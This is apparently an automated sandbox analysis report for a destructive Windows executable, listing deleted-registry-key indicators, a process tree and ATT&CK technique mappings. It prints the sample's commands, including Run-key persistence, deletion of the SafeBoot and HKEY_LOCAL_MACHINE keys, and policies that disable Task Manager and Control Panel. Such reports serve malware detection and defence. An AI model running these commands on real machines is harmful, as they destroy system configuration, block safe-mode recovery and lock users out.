Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{ECDB03D2-6E99-11d2-875F-00A0C93C09B3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\SUBMIT	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1F3C67C2-D153-11D0-BF8B-0000F81E8509}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B1F78FEF-3DB7-4C56-AF2B-5DCCC7C42331}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{06A7EC63-4E21-11D0-A112-00A0C90543AA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{4CECCEB1-8359-11D0-A34E-00AA00BDCDFD}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BDA-3C52-11D0-9200-848C1D000000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{DE233AFF-8BD5-457E-B7F0-702DBEA5A828}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D24D4453-1F01-11d1-8E63-006097D2DF48}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EC85D8F1-1C4E-46E4-A748-7AA04E7C0496}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{3EB9C349-7473-48AC-A59B-42F31751974B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\UnattendBackup\AllSitesCompatibilityMode	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CFFB1FC7-270D-4986-B299-FECF3F0E42DB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\CACHE_PAGES	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{CDEEC43D-3572-4E95-A2A5-F519D29F00C0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{167701E3-FDCF-11D0-A48E-006097C549FF}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\INTERNATIONAL\IDN_SHOWPUNY	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm5x.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{233A9692-667E-11d1-9DFB-006097D50408}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{2D360200-FFF5-11d1-8D03-00A0C959BC0A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{41D2B841-7692-4C83-AFD3-F60E845341AF}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F4894F79-8121-4DF2-B79E-ED73FA8ADE6F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{01E198E3-24FF-4602-9944-65E7B323296D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7A12547F-B772-4F2D-BE36-CE5D0FA886A1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A95845D8-8463-4605-B5FB-4F8CFBAC5C47}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm78.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmv	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_WINDOW_RESTRICTIONS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F3834A2B-19CF-4A90-BE1D-ECC410D9DA09}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\TLS1.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{41D2B841-7692-4C83-AFD3-F60E845341AF}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8BD21D50-EC42-11CE-9E0D-00AA006002F3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C3C9CB67-F453-479A-9AB0-94AE65F2EB2F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\C5A52B6EEA9A0DE8718AB9F50E9029738BB58650	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Capabilities\UrlAssociations	reg.exe

Modifies registry class 64 IoCs

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\contact_wab_auto_file\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\InfoPath.Application.3	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B95C2C1C-FA2F-319B-A6DA-8D560FD44553}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0006F050-0000-0000-C000-000000000046}\Control	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B1B831A1-C515-11D3-80A4-00C04FA1100A}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D8A1D5F9-DED4-4089-AAE9-60BCED32E8AE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bsc	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hol	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000672E5-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0B42E1A5-EC30-11D2-A5F2-00105A0D058F}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{42F39DBE-20B4-4DBA-B31A-580C74318E00}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D95A2970-4F52-4EE2-A438-4F1AD881F19F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B806F1A7-6278-405A-ABE4-E1AA3A3A550B}\1.0\0\win64	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AD74FC20-E09F-4E47-8A87-1DA49930867A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D38406DA-E8AA-484b-B80D-3D3DBDCC2FB2}\VersionIndependentProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Conversion\Readable	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8279FEB8-5CA4-45C4-BE27-770DCDEA1DEB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0AF7F3BE-8EA9-4816-889E-3ED22871FE05}\1.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DE48113-FA01-11D3-BDE3-0050DACD2017}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C077C822-476C-11D2-B73C-0000F87572EF}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E792405F-8668-11D3-9058-00C04F799E3F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ppt\PowerPoint.Show.8\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.wvx\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{806F543F-44B9-4DB8-B454-C4E77E14BD3C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\MSOLAP\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0006F023-0000-0000-C000-000000000046}\Typelib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C466759E-205C-11DC-9894-00123F2C1792}\VersionIndependentProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020854-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0006729B-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2E70527C-92D1-43CC-A57B-ED48BCCC711D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{83A0C7F9-822F-4246-ABD3-E3B3E511B36F}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Access.Project.14\shell\Open\ddeexec	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\otffile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.xls\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C89E9BDE-21E4-4F6E-BD6C-D84C0594DE62}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00063086-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{142911E9-7B83-11D3-895C-00105A272DCF}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{96C9FDC4-E4B1-11D3-8ED8-0050DACD1F80}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{EE1E20A4-DA60-3F43-8745-A624801D61C1}\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\OpenWithList	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0002442C-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{345062D3-AD83-4186-AE4E-CFDB1E859346}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A071BA28-7221-4712-98BB-4FB89D608BE2}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CDO.Configuration\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DED6D613-A3DB-4E35-BB5B-A92391133F03}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{129D8E91-BDBA-11D5-A736-0050DA5F0829}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2EE3A3B6-51B4-4A50-A2C1-097BD719D15C}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5E4391A0-274B-4B33-A8AA-D41D84442BCA}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{664EBB25-8AB1-441F-899E-5C88D5E4DECE}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9C5F1A9E-9A7F-4B68-8A78-F350D795337B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{51973C37-CB0C-11D0-B5C9-00A0244A0E7A}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2F7FC18E-292B-11D2-A795-DFAA798E9148}\ToolboxBitmap32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C100BED9-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0006309C-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{17D65374-C41C-4D09-8A41-743D0007537A}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8B8FA269-8C24-4272-928E-E7B3E04DA30C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B9075C7C-D48E-403F-AB99-D6C77A1084AC}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C46675B1-205C-11DC-9894-00123F2C1792}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\graflink.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\IImeIPointSrv1041\CLSID	reg.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.execmd.exe

description	pid	process	target process
PID 1256 wrote to memory of 1996	1256	166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe	cmd.exe
PID 1256 wrote to memory of 1996	1256	166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe	cmd.exe
PID 1256 wrote to memory of 1996	1256	166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe	cmd.exe
PID 1256 wrote to memory of 1996	1256	166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe	cmd.exe
PID 1996 wrote to memory of 1552	1996	cmd.exe	cacls.exe
PID 1996 wrote to memory of 1552	1996	cmd.exe	cacls.exe
PID 1996 wrote to memory of 1552	1996	cmd.exe	cacls.exe
PID 1996 wrote to memory of 1616	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1616	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1616	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1412	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1412	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1412	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 612	1996	cmd.exe	timeout.exe
PID 1996 wrote to memory of 612	1996	cmd.exe	timeout.exe
PID 1996 wrote to memory of 612	1996	cmd.exe	timeout.exe
PID 1996 wrote to memory of 1580	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1580	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1580	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1344	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1344	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1344	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 832	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 832	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 832	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1540	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1540	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 1540	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 960	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 960	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 960	1996	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe
"C:\Users\Admin\AppData\Local\Temp\166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D383.tmp\D394.bat C:\Users\Admin\AppData\Local\Temp\166c3c2fbe8392fb4b4ddaf5f192d94cc321c5fc4d65bd698a4d691416e999c6.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
3⤵
PID:1552

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Lenovo (-5934)" /d "C:\Users\Public\LENOVO.DAT.vbs" /f
3⤵
- Adds Run key to start application
PID:1616

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Lenovo (-11551)" /d "C:\Windows\System32\icmp.vbs" /f
3⤵
- Adds Run key to start application
PID:1412

C:\Windows\system32\timeout.exe
TIMEOUT /T 2 /NOBREAK
3⤵
- Delays execution with timeout.exe
PID:612

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\icmp.vbs"
3⤵
PID:1580

C:\Windows\system32\reg.exe
REG DELETE "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot" /v AlternateShell /f
3⤵
PID:1344

C:\Windows\system32\reg.exe
REG DELETE "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot" /f
3⤵
PID:832

C:\Windows\system32\reg.exe
REG DELETE "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\*.*" /f
3⤵
PID:1540

C:\Windows\system32\reg.exe
REG DELETE "HKEY_LOCAL_MACHINE" /f
3⤵
- Modifies firewall policy service
- Modifies security service
- Modifies system executable filetype association
- Adds Run key to start application
- Maps connected drives based on registry
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
PID:960

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
3⤵
PID:592

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v
3⤵
PID:560

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:1120

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
3⤵
PID:1492

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

6

T1060

Modify Existing Service

2

T1031

Change Default File Association

T1042

Browser Extensions

T1176

Privilege Escalation

Defense Evasion

Modify Registry

10

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

3

Peripheral Device Discovery

T1120

System Information Discovery

4

Lateral Movement

Collection

Data from Local System